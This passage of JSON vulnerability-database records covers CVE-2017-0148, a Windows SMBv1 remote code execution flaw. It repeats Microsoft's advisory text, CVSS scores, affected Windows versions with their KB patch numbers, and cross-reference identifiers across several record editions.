Systems Service Pack 2 (Server Core installation)", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Vista x64 Edition Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Vista Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2012 R2 (Server Core installation)", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows Server 2012 R2 (Server Core installation)", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows Server 2012 R2", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows Server 2012 R2", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows Server 2012 (Server Core installation)", "kbSupersedence": "KB3205409", "kb": "KB4012217", "msplatform": ""}, {"name": "Windows Server 2012 (Server Core installation)", "kbSupersedence": "KBMS16-110, 3187754", "kb": "KB4012214", "msplatform": ""}, {"name": "Windows Server 2012", "kbSupersedence": "KB3205409", "kb": "KB4012217", "msplatform": ""}, {"name": "Windows Server 2012", "kbSupersedence": "KBMS16-110, 3187754", "kb": "KB4012214", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1 (Server Core installation)", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1 (Server Core installation)", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows Server 2008 R2 for Itanium-Based Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows Server 2008 R2 for Itanium-Based Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows Server 2008 for x64-based Systems Service Pack 2 (Server Core installation)", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for x64-based Systems Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for Itanium-Based Systems Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for 32-bit Systems Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows RT 8.1", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows 8.1 for x64-based systems", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows 8.1 for x64-based systems", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows 8.1 for 32-bit systems", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows 8.1 for 32-bit systems", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows 7 for x64-based Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows 7 for x64-based Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows 7 for 32-bit Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows 7 for 32-bit Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows 10 Version 1607 for x64-based Systems", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows 10 Version 1607 for 32-bit Systems", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows 10 Version 1511 for x64-based Systems", "kbSupersedence": "KB3210721", "kb": "KB4013198", "msplatform": ""}, {"name": "Windows 10 Version 1511 for 32-bit Systems", "kbSupersedence": "KB3210721", "kb": "KB4013198", "msplatform": ""}, {"name": "Windows 10 for x64-based Systems", "kbSupersedence": "KB3210720", "kb": "KB4012606", "msplatform": ""}, {"name": "Windows 10 for 32-bit Systems", "kbSupersedence": "KB3210720", "kb": "KB4012606", "msplatform": ""}], "vendorCvss": {}}, "lastseen": "2021-09-07T10:44:22", "differentElements": ["msAffectedSoftware"], "edition": 20}, {"bulletin": {"id": "MS:CVE-2017-0148", "hash": "1455b21b7b338994ddec7ae57c94d0af", "type": "mscve", "bulletinFamily": "microsoft", "title": "Windows SMB Remote Code Execution Vulnerability", "description": "A remote code execution vulnerability exists in the way that the Microsoft Server Message Block 1.0 (SMBv1) server handles certain requests. An attacker who successfully exploited the vulnerability could gain the ability to execute code on the target server.\n\nTo exploit the vulnerability, in most situations, an authenticated attacker could send a specially crafted packet to a targeted SMBv1 server.\n\nThe security update addresses the vulnerability by correcting how SMBv1 handles these specially crafted requests.\n", "published": "2017-03-14T07:00:00", "modified": "2017-03-14T07:00:00", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "cvss2": {"cvssV2": {"accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "COMPLETE", "baseScore": 9.3, "confidentialityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0"}, "exploitabilityScore": 8.6, "impactScore": 10.0, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "severity": "HIGH", "userInteractionRequired": false}, "cvss3": {"cvssV3": {"attackComplexity": "HIGH", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 8.1, "baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.0"}, "exploitabilityScore": 2.2, "impactScore": 5.9}, "href": "https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2017-0148", "reporter": "Microsoft", "references": [], "cvelist": ["CVE-2017-0148"], "immutableFields": [], "lastseen": "2021-09-08T14:45:18", "history": [], "viewCount": 106, "enchantments": {"dependencies": {"references": [{"type": "cve", "idList": ["CVE-2017-0148"]}, {"type": "symantec", "idList": ["SMNTC-96706"]}, {"type": "thn", "idList": ["THN:18A54BDD63D7DC2B3284D326E6510150"]}, {"type": "mskb", "idList": ["KB4013389", "KB4012598"]}, {"type": "rapid7community", "idList": ["RAPID7COMMUNITY:7F979181993247D214BE9DB570C22482", "RAPID7COMMUNITY:B91CF4077282454499672A7AD6FBE744", "RAPID7COMMUNITY:4570AAF658D82BF591A6D6AB473704B6", "RAPID7COMMUNITY:CE638F8710DF0090997AF6FB196E2595", "RAPID7COMMUNITY:761964EB7C8E68AD2D9E6DC0095DF4C0", "RAPID7COMMUNITY:8B3AE9E0999C9317B6911ECE10B8A820", "RAPID7COMMUNITY:3EEFED2F93F50D3C56A51C03A7A3513D", "RAPID7COMMUNITY:9E4E3C72C90426CECD1801D8F0006388", "RAPID7COMMUNITY:958C8DA808BCCA56E72237E0015ED607", "RAPID7COMMUNITY:D6095B3BBE1704D4062E19C249D178EC"]}, {"type": "attackerkb", "idList": ["AKB:D476227F-C4B1-49E3-9947-897077E5150D", "AKB:B43D414F-6140-4931-BED8-4AE15FFDFAE1"]}, {"type": "huawei", "idList": ["HUAWEI-SA-20170513-01-WINDOWS"]}, {"type": "kaspersky", "idList": ["KLA11902", "KLA10977", "KLA10979"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:156196", "PACKETSTORM:142181", "PACKETSTORM:154690", "PACKETSTORM:142548"]}, {"type": "f5", "idList": ["F5:K57181937"]}, {"type": "zdt", "idList": ["1337DAY-ID-27752", "1337DAY-ID-27786", "1337DAY-ID-27613", "1337DAY-ID-33313", "1337DAY-ID-33895"]}, {"type": "openvas", "idList": ["OPENVAS:1361412562310810676", "OPENVAS:1361412562310810810"]}, {"type": "exploitdb", "idList": ["EDB-ID:47456", "EDB-ID:41987", "EDB-ID:41891"]}, {"type": "nessus", "idList": ["SMB_NT_MS17-010.NASL", "MS17-010.NASL", "700099.PRM", "700059.PRM"]}, {"type": "metasploit", "idList": ["MSF:AUXILIARY/SCANNER/SMB/SMB_MS17_010", "MSF:EXPLOIT/WINDOWS/SMB/DOUBLEPULSAR_RCE", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE", "MSF:EXPLOIT/WINDOWS/SMB/SMB_DOUBLEPULSAR_RCE", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE_WIN8"]}, {"type": "seebug", "idList": ["SSV:92952"]}, {"type": "ics", "idList": ["ICSMA-18-058-02"]}], "modified": "2021-09-08T14:45:18", "rev": 2}, "score": {"value": 7.3, "vector": "NONE", "modified": "2021-09-08T14:45:18", "rev": 2}}, "objectVersion": "1.6", "kbList": ["KB4012215", "KB4012214", "KB4012217", "KB4012212", "KB4013429", "KB4012213", "KB3210721", "KB3212646", "KB3210720", "KB4012606", "KB3177186", "KB4012216", "KB3205409", "KB3213986", "KB4012598", "KBMS16-110, 3187754", "KB4013198", "KB3205401"], "msrc": "", "mscve": "CVE-2017-0148", "msAffectedSoftware": [{"name": "Windows Server 2016 (Server Core installation)", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows Server 2016", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows Server 2008 for 32-bit Systems Service Pack 2 (Server Core installation)", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Vista x64 Edition Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Vista Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2012 R2 (Server Core installation)", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows Server 2012 R2 (Server Core installation)", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows Server 2012 R2", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows Server 2012 R2", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows Server 2012 (Server Core installation)", "kbSupersedence": "KB3205409", "kb": "KB4012217", "msplatform": ""}, {"name": "Windows Server 2012 (Server Core installation)", "kbSupersedence": "KBMS16-110, 3187754", "kb": "KB4012214", "msplatform": ""}, {"name": "Windows Server 2012", "kbSupersedence": "KB3205409", "kb": "KB4012217", "msplatform": ""}, {"name": "Windows Server 2012", "kbSupersedence": "KBMS16-110, 3187754", "kb": "KB4012214", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1 (Server Core installation)", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1 (Server Core installation)", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows Server 2008 R2 for Itanium-Based Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows Server 2008 R2 for Itanium-Based Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows Server 2008 for x64-based Systems Service Pack 2 (Server Core installation)", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for x64-based Systems Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for Itanium-Based Systems Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for 32-bit Systems Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows RT 8.1", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows 8.1 for x64-based systems", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows 8.1 for x64-based systems", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows 8.1 for 32-bit systems", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows 8.1 for 32-bit systems", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows 7 for x64-based Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows 7 for x64-based Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows 7 for 32-bit Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows 7 for 32-bit Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows 10 Version 1607 for x64-based Systems", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows 10 Version 1607 for 32-bit Systems", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows 10 Version 1511 for x64-based Systems", "kbSupersedence": "KB3210721", "kb": "KB4013198", "msplatform": ""}, {"name": "Windows 10 Version 1511 for 32-bit Systems", "kbSupersedence": "KB3210721", "kb": "KB4013198", "msplatform": ""}, {"name": "Windows 10 for x64-based Systems", "kbSupersedence": "KB3210720", "kb": "KB4012606", "msplatform": ""}, {"name": "Windows 10 for 32-bit Systems", "kbSupersedence": "KB3210720", "kb": "KB4012606", "msplatform": ""}, {"name": "Windows Server 2016 (Server Core installation)", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows Server 2016", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows Server 2008 for 32-bit Systems Service Pack 2 (Server Core installation)", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Vista x64 Edition Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Vista Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2012 R2 (Server Core installation)", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows Server 2012 R2 (Server Core installation)", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows Server 2012 R2", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows Server 2012 R2", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows Server 2012 (Server Core installation)", "kbSupersedence": "KB3205409", "kb": "KB4012217", "msplatform": ""}, {"name": "Windows Server 2012 (Server Core installation)", "kbSupersedence": "KBMS16-110, 3187754", "kb": "KB4012214", "msplatform": ""}, {"name": "Windows Server 2012", "kbSupersedence": "KB3205409", "kb": "KB4012217", "msplatform": ""}, {"name": "Windows Server 2012", "kbSupersedence": "KBMS16-110, 3187754", "kb": "KB4012214", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1 (Server Core installation)", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1 (Server Core installation)", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows Server 2008 R2 for Itanium-Based Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows Server 2008 R2 for Itanium-Based Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows Server 2008 for x64-based Systems Service Pack 2 (Server Core installation)", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for x64-based Systems Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for Itanium-Based Systems Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for 32-bit Systems Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows RT 8.1", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows 8.1 for x64-based systems", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows 8.1 for x64-based systems", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows 8.1 for 32-bit systems", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows 8.1 for 32-bit systems", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows 7 for x64-based Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows 7 for x64-based Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows 7 for 32-bit Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows 7 for 32-bit Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows 10 Version 1607 for x64-based Systems", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows 10 Version 1607 for 32-bit Systems", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows 10 Version 1511 for x64-based Systems", "kbSupersedence": "KB3210721", "kb": "KB4013198", "msplatform": ""}, {"name": "Windows 10 Version 1511 for 32-bit Systems", "kbSupersedence": "KB3210721", "kb": "KB4013198", "msplatform": ""}, {"name": "Windows 10 for x64-based Systems", "kbSupersedence": "KB3210720", "kb": "KB4012606", "msplatform": ""}, {"name": "Windows 10 for 32-bit Systems", "kbSupersedence": "KB3210720", "kb": "KB4012606", "msplatform": ""}], "vendorCvss": {}}, "lastseen": "2021-09-08T14:45:18", "differentElements": ["msAffectedSoftware"], "edition": 21}, {"bulletin": {"id": "MS:CVE-2017-0148", "hash": "47d8cff84559a6e03e5ea58b880c90dc", "type": "mscve", "bulletinFamily": "microsoft", "title": "Windows SMB Remote Code Execution Vulnerability", "description": "A remote code execution vulnerability exists in the way that the Microsoft Server Message Block 1.0 (SMBv1) server handles certain requests. An attacker who successfully exploited the vulnerability could gain the ability to execute code on the target server.\n\nTo exploit the vulnerability, in most situations, an authenticated attacker could send a specially crafted packet to a targeted SMBv1 server.\n\nThe security update addresses the vulnerability by correcting how SMBv1 handles these specially crafted requests.\n", "published": "2017-03-14T07:00:00", "modified": "2017-03-14T07:00:00", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "cvss2": {"cvssV2": {"accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "COMPLETE", "baseScore": 9.3, "confidentialityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0"}, "exploitabilityScore": 8.6, "impactScore": 10.0, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "severity": "HIGH", "userInteractionRequired": false}, "cvss3": {"cvssV3": {"attackComplexity": "HIGH", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 8.1, "baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.0"}, "exploitabilityScore": 2.2, "impactScore": 5.9}, "href": "https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2017-0148", "reporter": "Microsoft", "references": [], "cvelist": ["CVE-2017-0148"], "immutableFields": [], "lastseen": "2021-09-08T16:54:43", "history": [], "viewCount": 106, "enchantments": {"dependencies": {"references": [{"type": "cve", "idList": ["CVE-2017-0148"]}, {"type": "symantec", "idList": ["SMNTC-96706"]}, {"type": "thn", "idList": ["THN:18A54BDD63D7DC2B3284D326E6510150"]}, {"type": "mskb", "idList": ["KB4012598", "KB4013389"]}, {"type": "rapid7community", "idList": ["RAPID7COMMUNITY:4570AAF658D82BF591A6D6AB473704B6", "RAPID7COMMUNITY:D6095B3BBE1704D4062E19C249D178EC", "RAPID7COMMUNITY:958C8DA808BCCA56E72237E0015ED607", "RAPID7COMMUNITY:3EEFED2F93F50D3C56A51C03A7A3513D", "RAPID7COMMUNITY:8B3AE9E0999C9317B6911ECE10B8A820", "RAPID7COMMUNITY:B91CF4077282454499672A7AD6FBE744", "RAPID7COMMUNITY:9E4E3C72C90426CECD1801D8F0006388", "RAPID7COMMUNITY:7F979181993247D214BE9DB570C22482", "RAPID7COMMUNITY:CE638F8710DF0090997AF6FB196E2595", "RAPID7COMMUNITY:761964EB7C8E68AD2D9E6DC0095DF4C0"]}, {"type": "attackerkb", "idList": ["AKB:B43D414F-6140-4931-BED8-4AE15FFDFAE1", "AKB:D476227F-C4B1-49E3-9947-897077E5150D"]}, {"type": "huawei", "idList": ["HUAWEI-SA-20170513-01-WINDOWS"]}, {"type": "kaspersky", "idList": ["KLA10979", "KLA11902", "KLA10977"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:156196", "PACKETSTORM:154690", "PACKETSTORM:142548", "PACKETSTORM:142181"]}, {"type": "f5", "idList": ["F5:K57181937"]}, {"type": "zdt", "idList": ["1337DAY-ID-27752", "1337DAY-ID-27786", "1337DAY-ID-27613", "1337DAY-ID-33313", "1337DAY-ID-33895"]}, {"type": "openvas", "idList": ["OPENVAS:1361412562310810810", "OPENVAS:1361412562310810676"]}, {"type": "exploitdb", "idList": ["EDB-ID:41891", "EDB-ID:41987", "EDB-ID:47456"]}, {"type": "nessus", "idList": ["700059.PRM", "700099.PRM", "SMB_NT_MS17-010.NASL", "MS17-010.NASL"]}, {"type": "metasploit", "idList": ["MSF:EXPLOIT/WINDOWS/SMB/DOUBLEPULSAR_RCE", "MSF:EXPLOIT/WINDOWS/SMB/SMB_DOUBLEPULSAR_RCE", "MSF:AUXILIARY/SCANNER/SMB/SMB_MS17_010", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE_WIN8"]}, {"type": "seebug", "idList": ["SSV:92952"]}, {"type": "ics", "idList": ["ICSMA-18-058-02"]}], "modified": "2021-09-08T16:54:43", "rev": 2}, "score": {"value": 7.3, "vector": "NONE", "modified": "2021-09-08T16:54:43", "rev": 2}}, "objectVersion": "1.6", "kbList": ["KB4012598", "KB4012216", "KB3205401", "KB3205409", "KB4012215", "KB4012212", "KB3177186", "KB4013429", "KB3212646", "KB3210721", "KB4012213", "KB3210720", "KB3213986", "KB4013198", "KBMS16-110, 3187754", "KB4012214", "KB4012217", "KB4012606"], "msrc": "", "mscve": "CVE-2017-0148", "msAffectedSoftware": [{"name": "Windows Server 2016 (Server Core installation)", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows Server 2016", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows Server 2008 for 32-bit Systems Service Pack 2 (Server Core installation)", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Vista x64 Edition Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Vista Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2012 R2 (Server Core installation)", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows Server 2012 R2 (Server Core installation)", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows Server 2012 R2", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows Server 2012 R2", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows Server 2012 (Server Core installation)", "kbSupersedence": "KB3205409", "kb": "KB4012217", "msplatform": ""}, {"name": "Windows Server 2012 (Server Core installation)", "kbSupersedence": "KBMS16-110, 3187754", "kb": "KB4012214", "msplatform": ""}, {"name": "Windows Server 2012", "kbSupersedence": "KB3205409", "kb": "KB4012217", "msplatform": ""}, {"name": "Windows Server 2012", "kbSupersedence": "KBMS16-110, 3187754", "kb": "KB4012214", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1 (Server Core installation)", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1 (Server Core installation)", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows Server 2008 R2 for Itanium-Based Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows Server 2008 R2 for Itanium-Based Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows Server 2008 for x64-based Systems Service Pack 2 (Server Core installation)", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for x64-based Systems Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for Itanium-Based Systems Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for 32-bit Systems Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows RT 8.1", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows 8.1 for x64-based systems", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows 8.1 for x64-based systems", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows 8.1 for 32-bit systems", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows 8.1 for 32-bit systems", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows 7 for x64-based Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows 7 for x64-based Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows 7 for 32-bit Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows 7 for 32-bit Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows 10 Version 1607 for x64-based Systems", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows 10 Version 1607 for 32-bit Systems", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows 10 Version 1511 for x64-based Systems", "kbSupersedence": "KB3210721", "kb": "KB4013198", "msplatform": ""}, {"name": "Windows 10 Version 1511 for 32-bit Systems", "kbSupersedence": "KB3210721", "kb": "KB4013198", "msplatform": ""}, {"name": "Windows 10 for x64-based Systems", "kbSupersedence": "KB3210720", "kb": "KB4012606", "msplatform": ""}, {"name": "Windows 10 for 32-bit Systems", "kbSupersedence": "KB3210720", "kb": "KB4012606", "msplatform": ""}], "vendorCvss": {}}, "lastseen": "2021-09-08T16:54:43", "differentElements": ["msAffectedSoftware"], "edition": 22}, {"bulletin": {"id": "MS:CVE-2017-0148", "hash": "1455b21b7b338994ddec7ae57c94d0af", "type": "mscve", "bulletinFamily": "microsoft", "title": "Windows SMB Remote Code Execution Vulnerability", "description": "A remote code execution vulnerability exists in the way that the Microsoft Server Message Block 1.0 (SMBv1) server handles certain requests. An attacker who successfully exploited the vulnerability could gain the ability to execute code on the target server.\n\nTo exploit the vulnerability, in most situations, an authenticated attacker could send a specially crafted packet to a targeted SMBv1 server.\n\nThe security update addresses the vulnerability by correcting how SMBv1 handles these specially crafted requests.\n", "published": "2017-03-14T07:00:00", "modified": "2017-03-14T07:00:00", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "cvss2": {"cvssV2": {"accessComplexity": "MEDIUM", "accessVector": 